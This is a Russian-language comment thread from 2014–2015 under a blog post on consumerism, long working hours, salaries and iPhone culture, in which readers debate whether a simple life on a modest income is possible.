Технический прогресс человека разумного был просто неизбежен, но целью прогресса является - избавление от рутинных бытовых обязанностей или повышение КПД использования ресурсов планеты. Фактически направлен на стабилизацию и автономию общественного базиса, где гарантируется минимум, необходимого для жизнедеятельности человека, а основной стихией станет среда духовно-интеллектуальная. "Пока робот вам готовит завтрак Вы медетируете на восходе солнца!" Но прогресс повернули в ином направлении: полезных продуктов стало меньше (КПД использования ресурсов снизился) , а разум наш "жуёт" жвачку, оставаясь на примитивном уровне. "Хлебаем Доширак, успокаивая себя тем, что у нас есть гаджет с четырёхядерным процессором." Единственное что мне кажется неправдоподобным в описанной истории - это тезис "деньги не нужны", по-моему делается всё, что бы даже скромному человеку они были "очень нужны", социалка монитизирована, по сути капитализм идёт путём "средневековой церкви", кто не зарабатывает отлучается от цвилизации и отправляется в изгнание. Темп жизни сделан максимально высоким, что бы небыло времени задуматься о происходящем. Работая в коллективе, человек лучше проявляет некоторые свои качества , лучше организован (офисные костыли), но при этом он становится носителем "массового сознания", а индивидуальное "я" (самосознание) затухает, он больше становится биороботом-шестерёнкой. И месяц отпуска - это как раз тот интервал времени, который не даёт человеку вернуть своё самосознание и угаснуть массовому. Люди научились планировать даже отдых - самые натуральные зэки на режимном объекте! Это ли рассвет Человеческой цивилизации?!!
Максим2015-04-26 23:08:41
Согласен. Есть ценности, более важные, чем работа на чужого тебе дядю. Например, уделять время семье, принимать участие в воспитании детей, а не просиживать штаны каждый день большую часть дня в офисе. Большинство людей живут лишь ключевыми событиями: окончил вуз, нашел работу, женился, родился сын, сын пошел в школу, сын поступил в вуз, родилась дочь, сын женился, дочь пошла в школу, дочь вышла замуж, смерть. Все, что между этими событиями, тонет в сером тумане трудовых однообразных будней: дом-работа-дом-работа-дом-работа. Вот так вот) На счет айфонов добавлю: когда Стив умер, у них теперь новая политика - к выходу нового айфона выходит новое обновление, которое делает работу на старом девайсе невозможной или по крайней мере мучительной. Типа железо не тянет)) И от обновлений отказаться нельзя, откатить их нельзя. Приходится выкидывать старый девайс и покупать новый, который тоже заступорится, когда в продажи выйдет очередная новинка))) Кто не готов каждые пол года брать новый кредит на айфончик, даже и не суйтесь в это болото))
Олег2015-04-24 15:27:23
Человек выбирает себе окружение и это окружение толкает его в определённом напрвлении. Если вокруг тебя люди которым нужна квартира, закрыть долг, жена в декрете с ребёнком т.е. находящиеся в финансовой нужде, то они будут толкать тебя пахать с 9 до 21, молчать при постоянных истериках прямого начальника и скрипя сердцем бежать в курилку после очередной фантазии алчного руководства. У меня был случай: от работы (читай выше) начались мигрени, по страховке от компании пошёл ко врачу и та удивлялась отчего столько наших сотрудников идут к ней с аналогич жалобами. На эя я ответил, что если у Вас на приём больного предусмотрено 30 минут и каждый год будут требовать сокращение времени на 15 %, то через 6 лет начнуться мигренные боли. Врач согласилась. Капитализм братцы, ему наплевать на персонал, будут регулярно повышать цены и оптимизировать з/п и издержки на качество продукции, капитализмъ.
Кирилл2015-04-22 14:40:07
Поддерживаю и согласен с вышесказанным))) айфон ОЧЕНЬ НУЖЕН)))) а потом ломают ещё его и несут в ремонт и удивляются что так дорого берут с них) а ты когда за 50к его покупал не думал что он такой же как и все остальные телефоны Всё внутри тоже самое что и в дешёвых мобилках)
согласен2015-04-17 21:48:18
...читаю, и понимаю что сегодняшние мои мысли именно такие!!! пашешь, жрешь, спишь и нужду справляешь!!! мир без тебя живет - ты малюсенький червяк, считающий себя ВАЖНЫМ ЗНАЧИМЫМ ЗАРАБАТЫВАЮЩИМ... а для чего тебе самому не понятно!!! ЛЮДИ ЖИВИТЕ!!! оторвите головы от инфо - паутины!!! ПОДУМАЙТЕ!!! мир такой огромный и прекрасный.. начните с себя.. приберите дома, уберите мусор возле подъезда (дома).. посмотрите на небо.. на деревья...
комментатор2015-04-17 02:29:00
Вы батенька не правы, однака. с этой позиции, позиция любого лузера будет выигрышной, как ни крути....
Дмитрий2015-04-11 03:54:44
Ну деньги деньгами, каждый ищет своё место. Меня больше напрягает работать 5\2, якобы работаем 40 часов в неделю, отдыхаем 48. Где справедливость? Готов работать 48 часов, скажем понедельник и среду - двое суток, остальное время моё.
евгения2015-04-10 01:07:29
класс!
Ярослав2015-04-09 16:08:00
К сожалению на выживание семьи из 4 человек сейчас выходит никак не меньше 60-70 т.р. Без изизлишеств.
Андрей2015-04-05 04:50:01
Молодец, автор. Здраво мыслит. Я почитал, сколько мне денег нужно для счастья (только на себя лично, а не на семью, коммуналку, поборы и прочие вынужденные отчисления), получилось примерно 12-15 тысяч в месяц. Так что если бы я жил один, то доход от 30 тысяч в месяц был бы уже излишним: деньги не на что было бы потратить.
Татьяна2015-04-03 18:23:04
Всё правильно. Но автор написал этот, безусловно, гениальный опус уже почти полгода назад, и эти месяцы оказались для экономики страны роковыми... Сейчас выходит, что на 30 т.р. еще можно как-то жить, а на 20 - только выживать. Причем, халявных работ с з,п 20 т.р. становятся всё меньше - людей заставляют впахивать не покладая рук и за гораздо меньшее вознаграждение, например, в отвратительных гос.учреждениях таких как налоговые, нотариалки,суды: там, где и ответственность, и нервы. Ни о каких ипотеках и прочих дорогих удовольствиях сейчас речь не идет ни в одной адекватной семье с таким доходом (уже получается-ниже среднего). Когда я 2 года назад закончила университет, я,как молодой специалист, рассчитывала на 30т.р. - не меньше. И первое время я зарабатывала такие суммы с легкостью, работая в несложной программке, пиная балду за компьютером и устраивая чаепития каждые полчаса. Но шло время, и за подобную работу стали предлагать 22, а то и 18 т.р.... Сейчас работаю, особо не напрягаясь - но об айфоне даже не мечтаю. Но довольна тем, что живу по средствам, не влезая в долги, не обращаясь в конторки вроде "Заначки" и не занимая у друзей.
Не все есть деньги, не деньги есть все2015-04-01 12:42:39
Молодец автор, все правильно написал. Только можно совсем не курить, ибо гадость, не пить пиво, ибо гадость и вредно, а сэкономленное на гадостях пустить на приятные мелочи. Мне не нужен айфон, но есть удобный смартфон, есть айпад, квартира в Москве и машина. В принципе, можно и жить на 30к, наверное, но не хочется. И пить дешевое пиво или вкусное вино... И даже если я буду говорить, что АвтоВАЗ = VAG мой опыт вождения и того и другого говорят об обратном. Можно и пешком ходить, и в метро ездить, но не хочется. Я люблю наслаждаться вкусной едой и хорошим вином. И помидоры с даниловского рвнка по 800 руб/кг очень отличаются от тех, что в пятерочке за 120. И вино за 100 руб/бут только называется так, французский столовняк меньше, чем за 1,5к покупать нет смысла. Можно жить на 30к но мне больше нравится жить на 150. И то мало. Рабы? Да! Рабы своих потребностей. И нет бОльшего удовольствия, чем удовлетворить ими себя, любимого. И с наслаждением побродить по Мадриду и поплавать на арендованной яхте по Красному морю. Добро пожаловать в мир потребителей! ЗЫ а кока-колу - гадкий продукт - можно не пить вообще. Да прибудет с нами сила, здоровье и достаток. Аминь.
Ида2015-04-01 02:11:16
Почитала я все отзывы и статью)) Автор , конечно прав)) Только он прав при одном условии, что у него есть крыша над головой, своя собственная, обставленная мебелью, пусть не самого лучшего качества и более менее нормальный ремонт, так чтоб штукатурка на голову не падала)) Я маркетолог по специальности прекрасно понимаю, где развод в рекламе, а где достойное качество, но на квартиру, получая 20 к не заработать, даже взяв ипотеку, особенно учитывая проценты, которые берут наши банки. так что тут не до излишеств, и каждый сам принимает решение, что покупать и вестись ли на рекламу)) Но квартиры нынче очень дорогие, а жить в глухом селе, на земле, тоже деньги нужны, а заработать их можно только в городе. Поэтому все будут стремиться заработать больше, потому что деньги дают свободу, свободу выбора и только не совсем умные люди тратят деньги на то,что им совсем не нужно. Ну и, если учесть тенденцию последнего времени, то работает большинство много, а зарабатывают в разы меньше, как говорится- не до жиру, быть бы живу....
Павел2015-03-30 22:26:54
Автор ЗАЧЕЕЕЕТТТТТ!!!! К сожалению сейчас все так помешаны на материальном, что совсем забыли о простых и добрых вещах... Мы рабы нашего времени...((((( Полностью согласен с автором!!!
Женя2015-03-28 02:51:30
это подходит к определённому типу людей,которым ничего не надо,им и так хорошо... а вот как реализовать желание с путишествиями,с коллекционированием эмоций и воспоминаний, не всем хочется прожит и умереть в своём городе ,на той же улице где тебя и зачали.....возможно даже на том же диване...
Петрович2015-03-27 05:32:35
Меня убивает чё написал чувак с супер ником "Просветлённый" - пиз...цц,сад буээ в котором человечки буэээ,чувак не хотел тя разочаровывать но всё что останется от тебя и от твоих внукодетей это биошлаки,я понимаю шо ты хотел воспарить вознестись и производить добро в виде сажаний садов в которых эти зелёные человечки буэээ..
Просветлённый2015-03-25 12:16:07
Отчасти, всё - правильно! Но,никто не сказал о главном предназначении человека. Его духовном багаже, который он накопит за время пребывания на Земле. И то полезное, что он оставит после себя детям, внукам...А это и построенный своими руками дом, и посаженный сад, и тех маленьких человечков, которые вырастут достойными людьми. Всё остальное - пустое...
дядя жора2015-03-25 10:46:11
маняподросток нарисовался. посмотрю, как ты с тридцаткой в месяц будешь тащить семью с двумя детьми и женой в декрете. получая ~80 в такой ситуации будешь ездить на бюджетной иномарке B класса, жить в 50 метровой двухе в спальнике и о пиве за 70 рублей не думать вообще. а ты пока борись с системой - сходи манту намочи.
кадыров2015-03-21 12:20:00
Терпилы!))))пора нам показать кто хозяин в этой банановой республике!Поставим всех в стойло!Вперёд!
ВВС2015-03-20 12:28:19
С позицией в целом согласен. Лично я не вижу где квалифицированный технический специалист может прилично заработать не прихватывая выходные и не засиживаясь допоздна. Это работа на аптеку и будущую инвалидность. Нельзя становится рабом своих желаний, в жизни много чего интересного и далеко не все увлечения требуют больших денег. Сам получаю невеликую зарплату, но на работу хожу без отвращения, наладил себе комфортные условия, короче - второй дом и есть возможность что-то сделать для дома, для семьи. Не шикую, но и не голодаю, в отпуск хватает съездить с женой на море дикарями. В свободное время - дача, природа (лес, река, грибы-ягоды), хозяйство (люблю с инструментом повозиться), книги, музыка, фото, люблю искусство в любых его формах, выставки, концерты, экскурсии, просто побродить в интересных местах, исследовать и изучить что-то новое... И какие великие деньги для этого нужны? Нужны только оптимизм и здоровье, а этого не будет если вкалывать как вол, и на хрена такая жизнь, Жить нужно сейчас, а барахло "нажитое непосильным трудом" в могилу не прихватишь.
Игорь2015-03-19 16:31:16
Чем приятнее работа тем больше за неё платит, к примеру начальник получает в два раза больше, и не работает, только подгоняет нас. И график у него, прийти в любое время и то не всегда. В теории одно и бомжом жить бесплатно, вон в лондоне бомжей кормят просроченными товарами, которые в москве продают даже без уценки.
кадыров2015-03-17 21:38:00
Всех этих сраных спизнесменов)))нужно наказать)страна терпил какая-то)))
Влад2015-03-16 12:26:48
Всегда задавался вопросом нафиг нужна даже высокооплачиваемая работа если она не оставляет времени на жизнь? И всегда давал себе ответ - чтобы жили хозяева. Я работал в фирме где руководство появлялось на работе от силы 3 раза в неделю и то не на целый день чтобы выдать порцию люлей и ввести идиотские нововведения, а потом при всех обсуждало прошлые и будущие поездки на всякие курорты с блекджеком и шлюхами, спортивные мероприятия за рубежом, а работников заставляло сидеть на работе по выходным хотя работы было только что в потолок плевать и это никак не оплачивалось. Нафиг такие работы!
не Платон2015-03-15 02:46:21
... и этого не дают. с него и начало..
Андрей2015-03-12 16:46:58
Личнно я увидел в этом логику - ты должен работать много что бы зарабатывать много, на тех кто работает меньше но зарабатывает больше, что бы купить вещь себе подороже, что бы заработал другой тот который работает мало но получает много, но не стоит забывать что те кто работает мало но получает много, все равно вынуждены платить немного тем кто работает много. Все уже давно написано и даже спето. Круговая порука мажет, как копоть Я беру чью-то руку, а чувствую локоть Я ищу глаза, а чувствую взгляд, Где выше голов находится зад За красным восходом — розовый закат Скованные одной цепью, Связанные одной целью Скованные одной цепью, Связанные одной.
Даша2015-03-12 16:40:17
Не все относятся к работе так же.
Надежда2015-03-11 20:27:03
вообще, в статье есть здравый смысл. но все-таки автору с его фразой про "он будет покупать дороже на 10 рублей, куртки дороже на 3-4к, а пиво на 40 рублей. Появятся всякие дебильные желания, вроде покупки пиццы, сходить в боулинг и прочие менеджерорадости" стоит задуматься. Во-первых, не все то золото, что блестит. Другими словами можно покупать и макароны по 15р за 5кг (да-да, есть такие). Но встанет вопрос: а что же потом с этим человеком будет после такого комбикорма? Удобная обувь или та, что налезла пусть будет счастьем за такие деньги? Есть такое, что можно купить дешевле и получить то же самое качество, но далеко не всегда. Во-вторых, работая 3 дня в неделю, человеку нужно чем-то заниматься оставшиеся 4. и при этом обычно на эти занятия требуются деньги. разве что бегать трусцой можно бесплатно =) а если нечем заняться, то нафига эти дни нужны? Ну и в-третьих. Существуют люди, которые действительно хотят работать, а не х** пинать. Просто потому.. что им скучно и хочется куда-то себя вложить, чтобы не бездельничать )
Александр2015-02-27 14:00:50
"Потреблядство" - слышали такой термин? А вообще, автор прав, но эта система, по большому счету, очень стара, так было всегда. Мораль проста - нужно научиться радоваться тому, что имеешь, рационально расходовать ресурсы, не делать материальное благополучие смыслом жизни и существования. Я считаю, что на первом месте должны быть всё же человеческие, земные ценности, ведь сейчас, как никогда прежде, всё чаще звучит фраза: если ничего не получилось в бизнесе, женись и говори всем, что выбрал семью. А так ли плох такой вариант? Каждому своё.
РУс2015-02-25 20:22:05
Браво! Жаль, что 90% людей этого никогда не поймут. Экономика потребления сейчас правит миром. Надо быть скромнее...
Таисия 2015-02-25 18:55:24
Да ))))))), товарищи лентяИ и работаИ, со всеми согласна и со статьей тоже. Но есть одно НО, проверенное лично на себе. Когда вдруг, эдак, внезапно, начинается война и все катиться в неизвестность в одной и той же заднице оказываются как лентяи, которые себе ничего не наработали, так и усиленно работающие человеЧЕКИ, у которых разве что получилось что-то выдрать у банка или удрать на дорогом авто с чемоданчиком. а дальше откроется уже другая перспектива, в которой почему-то работяжка и лентяй окажутся на одном уровне, если, конечнг вы не гений )))))
человек2015-02-24 17:40:20
а мое мнение пусть каждый сам решает как ему жить и какой баланс иметь 50/50 30/70 и так далее. пейте кока колу по 500 рублей или квас за 50 рублей лишь бы вам было хорошо и комфортно в жизни. каждый сам решает момент наступления комфорта. все взрослые люди и все умеют думать и ВСЕ ошибаются.
Оксана2015-02-21 16:48:19
Ой, Лев, ты прям всех тут размазал=))) наверное специально искал, где подобное написать............
Лев2015-02-21 14:03:00
Привет, соляным лентяям! Пока вы тут пи..... Жалуетесь не чего не изменится, можно хоть тысячу раз оценивать всю систему и закапываться в поисках своего пути Но знайте !! Комфортную Машину купит другой и айфон подарит своей сексуальной жене А айпад любовницам.. Да Нос выше работать надо рабам А лентяи Должны придумывать работу и парить мозг трудягам . P.S Пока неопытные.
Вселенский разум2015-02-17 15:55:48
Дело не бесполезности айпада - тут все индивидуально. Дело не в дорогих автомобилях, и не в том что тебе навязали рокупку этого авто... Никто и никогда не сможет навязать тебе что-то если ты сам этого не хочешь. Дело в комфорте! Хочешь комфорт - заработай на комфорт. Умные люди сначала работают на работу, потом работа работает на этих людей. А уж сколько своего времени придется потратить 50/50 или 70/30 - зависит только от ваших умственных а иногда и физических способностей.
Иван2015-02-14 01:48:26
Типичные рассуждения люмпена.
safeharm2015-02-13 12:34:38
очень интересно описал! такая позиция возможна, тем более сейчас, когда всем навязываются только дорогие товары. Про рациональное использование никто не сообщает
Станислав2015-02-08 16:18:46
При современном развитии технологий, работать люди должны по 30 мин. в день для обеспечения себя всем необходимым. Взять например компьютер. Раньше вручную всю документацию заполняли и успевали, а сейчас с ксероксами и принтерами в постоянной запаре. Кстати в редких компаниях сотрудники работают по 8 часов, большая часть рабочего дня уходит на перекуры, чай, кофе, глупые и неглупые разговоры, просто обычное просиживание.
zx0101 01012015-02-07 13:36:34
В этом есть доля разума, но не всё так просто.
Егор2015-01-31 11:49:39
Максим "откладывать хоть 10% процентов от своего заработка и тогда жизнь будет стабильнее" 10% -это очень мало . Это в развитом обществе , при хорошей страховой медицине , низком уровне безработицы , адекватной ЗП. У нас откладывать нужно значительно больше . 10% - это белеберда из какой-то надуриловки эпохи псевдобума 2003-2008 гг. Все наоборот- необдуманно тратить можно только 10% ! Все остальное или тратится с головой или откладывается !
Дмитрий2015-01-26 23:24:16
"Потреблятство - болезнь угрожающая миру" автора, к сожалению, не помню. Анализ того как изменилось американское общество с 40-х годов 20 века до начала 21. Например, дома, с момента окончания 2 Мировой Войны, в среднем стали больше в 3 раза. Количество мусора, образующегося в процессе жизнедеятельности человека, увеличилось на 2..3 порядка. Не Россия, но мы догоняем очень быстро.
Александр2015-01-26 13:41:59
Грамотно написал ))
Максим2015-01-23 15:57:54
Нечего нового в посте нет, весь мир создан на коммерции и "втюхивание". Есть велика фраза "Богат не тот который много зарабатывает, а тот который умеет откладывать и вкладывать". Даже если мы будем получать 100тыс. при увольнении нам нечего будет есть, так как всегда найдем куда потратить деньги, если они есть. Главное не везтись разводы маркетологов и откладывать хоть 10% процентов от своего заработка и тогда жизнь будет стабильнее. И к сожалению во многих компаниях любят загружать по полной тех людей которые это будут тянуть и слово не скажут, а зп будет как у других, вот только функционала будет уйма и будут они сидеть до 9 вечера не видя семью... Так жить не стоит, себя нужно уважать и иногда говорить стоп!
не мент2015-01-23 14:36:18
"Читающий ...Мой грудной ребенок должен получать хорошее питание, а не то что не стали есть даже свиньи - это не шутка и не метафора, экспериментировал с различными питаниями!,,, в магазине трудно найти хорошее питание даже для взрослого сорви сам яблоко натри его будет натуральное пюре, без химии и БЕСПЛАТНО много поколений и ваши родители (не они так бабушки с дедушками) выросли без памперсов и магазинного питания. техника конечно нужна, но купи к примеру сотовый и его хватит на много лет тем более многие новые фукции преподносят как новые хотя часто они были и раньше С автором полностью согласен а кола - вообще яд, водка и то гораздо безобиднее будет
мент2015-01-23 12:18:07
мысли глупые. автор возомнил себя великим аналитиком.
Алекс2015-01-22 19:04:00
Не поддерживаю того , кто писал эти мысли вслух
Лозунг2015-01-21 15:16:00
Скажу автору по секрету, что стоимость бутылки много меньше десятой доли. ))
Читающий2015-01-21 14:46:00
Наверное буду первым, кто по большей части не согласится с автором, хотя рассуждения и можно назвать правильным. Избыточные потребности - что это? Зачем вашему знакомому 20 т.р. в месяц, если можно прожить и на 10! У него половина суммы уходит на излишние потребности! Местному, так сказать, пиву я предпочитаю виски, куртки на 3-4т.р. дороже - Вам никогда не приходила в голову пословица: встречают по одежке, провожают по уму (но с такой одежкой до ума может и не дойти)... Мой грудной ребенок должен получать хорошее питание, а не то что не стали есть даже свиньи - это не шутка и не метафора, экспериментировал с различными питаниями! Как человек, который в данном случае по сити будет жить от зарплаты до зарплаты и в случае непредвиденных обстоятельств (увольнение, торжества, похороны...) не имеющий резервов будет жить дальше? Залезет в кабалу под названием кредит? На что вы планируете тратить свое свободное время? На прогулки по парку или торчание перед ящиком? Ведь, исходя из вашего суждения нельзя заниматься каким-то своим делом, проносящим доход т.к. это повлечет трату на избыточные потребности, нельзя куда-то поехать т.к. это избыточная потребность и трата денег. Зачем ехать хотя бы в другой парк Москвы, если у тебя рядом с подъездом есть лавочка и на ней можно также посидеть!? К сожалению или к счастью, общаясь в тех или иных кругах, ты должен соответствовать им. p.s. у меня никогда не было айфона и планшета, суть последнего пока вообще для себя не понял.
Василёк2015-01-16 14:36:17
Подводя итог, была создана система ценностей, которая ориентирована на то, чтобы человек стремился конвертировать свое время *В* эти ценности. Самая большая ценность - время, потраченное на близких.
дивергент2015-01-15 21:34:02
настя , отделяйте, таки, зерна от плевел... мухи отдельно котлеты отдельно...а бусы аборигенам в замен на рабство...? а , привитую близорукость за желание иметь любой ценой кокаколу... а не квас....? а ... ну и т. д. по списку.... зависимость .... принуждение.... жить как живут они а не как хочу я... и совсем не факт что живут они всегда качественней и интересней. мужчин привлекает женское тело. женщин привлекает мужской ум. вот каждый и любит то что ему нравиться.
Настя2015-01-14 14:17:16
Спорная статья. Почему сразу айфон и дорогой автомобиль? А абонемент в бассейн для детей? А качественное сбалансированное питание? А удобная добротная обувь? А качество жизни? А возможность путешествовать? Где ни будь все это раздают даром?
illiakiv2015-01-14 09:41:46
"Работа - не волк, в лес не убежит." Нужны деньги, так называемая высококонцентрированная энергия жизни. Есть современный анекдот: "Ищу деньги, работу не предлагать!" "Деньги решают всё!" То есть нужна цель, ради которой можно потратить имеющуюся энергию. Помехи (т.н. ловушки для потребителя) на пути достижения поставленной цели надо блокировать (обходить, преодолевать и т.д.). Люди! Думайте головой, прежде чем что-либо делать!
аветкетьввнетвнеон2015-01-12 22:15:04
Шепард (коммент от 26.12.14, 10:43), перегибаете палку так, что любой поймёт, как Вам нужны рабы, готовые для Вас за Ваше бабло элегантным фрискарсом любому голову располовинить.
Елена2015-01-12 18:50:03
Неплохой пост, написан доступным языком. А я думала, что только у меня в последнее время возникают мысли о потребительском образе жизни :) Абсолютно согласна с тем, что мы покупаем кучу ненужных вещей, правда я задумалась куда же деть деньги если я не напокупаю кучу тряпок и т.п., ведь мало кто из работодателей согласится на 3х дневную рабочую неделю, но и совсем ничем не заниматься, ковыряя в носу, не прельщает. Эдакая теория анти-потребительства нужна :)
Артур2015-01-12 04:09:11
Очень хорошо написал. Прямо мысли в слух. Спасибо.
Максим Максимов2015-01-11 06:52:00
Я вообще уже сто лет Кака-Колу в рот не беру.! Этот продукт наряду с Фантой даже на 10-и градусном морозе не замерзает! Пью травяные чаи с мёдом, кефир и т.д.
Регина2015-01-09 21:06:57
Предлагаю встретиться и что-нить такое -анти- замутить. Сговор против корпораций так сказать...
Регина2015-01-09 21:03:57
Ну просто шикарный пост... Жму лапу!
Антон2015-01-06 15:35:43
крепостное рабство не кто не отменял так как это активы, просто провели реформу модернизацию
Андрей2015-01-05 22:59:59
"...работаешь мало, получаешь мало, а работаешь много получаешь много..." Формула не на сто процентов верна. Зачастую наоборот: работаешь как лошадь, а получаешь как обычно. За твои переработки в лучшем случае скажут "спасибо", но это в лучшем...Обычно: мол, задержись на часок-второй, ну помоги уж и т.п.!
Да.2014-12-31 11:02:53
Я работаю потому что у меня нет своего дома. И я очень хочу чтобы он у меня был. Круто когда с рождения есть где жить, и в юности/молодости не нужно париться о том, что 50% зп съест аренда. Деньги могут дать мне крышу над головой - и дадут. Так что с автором соглашусь частично - тружусь ради обретения не айпада или дорогой шмотки, а потому что хочется в будущем иметь семью и жить в собственном доме.
Кристина2014-12-29 01:02:09
100 % попадание
Шепард2014-12-26 12:43:06
Автор, так в чем проблема то? Дуй в лес, сколоти шалаш из веток. Из одежды бери старый проверенный китайский пуховик из синтепона, а не удобную и легкую коламбию, которая, конечно же, излишество. Дрова руби старым совковым топором с топорищем из чугуния весом в 100 тонн, а не легким и удобным фрискарсом. Унитаз, душевая кабинка, туалетная бумага - к чертям эти навязанные буржуйские заморочки. Гадить можно под любым кустом, а подтираться лопухом. И никакого офисного рабства!
Алексей2014-12-26 09:46:18
Согласен с автором. А первоначальная причина, по моему, в черезмерном росте городов.
Ирина2014-12-26 00:16:19
А что, так и есть. Маркетинг правит миром. На полах много книг- как продать больше и выгоднее.Слышали современную пословицу:"Лджи не носят и бомжи"?. Лджи как бы простой телефон и несовременный, считается плохим. Хотя, если задуматься, а для звонков он пригоден, и в интернет с него можно залезать. Чем он хуже всех, не пойму, вопрос престижа. Или плохим считается, потому что дешевый. Если человек только пишет смс и звонит, Лджи не плох, к тому же он легкий. У меня много родственников им пользуется, а молодые братья и сестры морщят нос при виде Лджи. А прелестей айфона всех тоже не пойму. Вот я если не лажу в интернет с телефона и не играю в приложения, нафига мне айфон?? Хорошее качество камеры есть и Самсунге, которым сейчас пользуюсь. А еще умиляют люди, которые покупают престижную технику с небольшой зарплаты и хвастаются всем. У меня парень бывший с зп 20000 купил айфон с кредит, радовался, как ребенок блин! Вот зачем, что он менеджер корпорации- ему "яблочная" техника нужна по статусу? Нет, обычный бармен в забегаловке, живет в квартире без ремонта и с советской мебелью с мамой в однушке, вот если бы он взял кредит на новую мебель, еще куда ни шло. Нет, все мозги им с мамой засорило потребеление. Новая плазма висит посреди старого ковра. Вот, не пойму таких людей...........
Алекс2014-12-24 10:19:08
КЛАСС!
Валерий2014-12-23 20:08:51
Можно продолжить сии правильные рассуждения и сказать, что это навязанная человеку система жизненных "ценностей" для того, чтобы он как можно больше потреблял и для этого работал. А отдыхать ему незачем. А то вдруг у него появится время задуматься о смысле жизни, а это вообще очень опасно:)...
Анатолий Космак2014-12-23 18:20:29
ТОЛКОВЕЙШИЙ КОММЕНТАРИЙ
Facepalm2014-12-22 23:54:16
Не вопрос, кури приму без фильтра, купи старинный ЭЛТ монитор, сиди дома и играй в тетрис. Спрос рождает предложение.
Facepalm2014-12-22 23:44:37
Удовольствия вообще-то денег стоят.
Кирилл2014-12-22 17:02:11
В целом согласен с автором, но с небольшой помаркой: для меня важно чувствовать радость на работе. В целом я выберу менее оплачиваемую должность и буду в отличном расположении духа, чем за 100 тысяч рублей в месяц буду заставлять себя улыбаться на рабочем месте и делать вид, что все хорошо. Как-то так)
Кузьма2014-12-22 14:19:54
А что делать все эти лишние три-четыре дня, если сходить никуда нельзя, т.к. денег нихрена нет? Сидеть за компом и в игрульки играть? Очень ценное времяпрепровождение ))) Нужна цель в жизни, нужны стремления, нужно чем-то заниматься и если этого ничего нет, то человек существует просто как биомасса.
Александр2014-12-22 13:50:51
Одна из уловок современной системы.



Реклама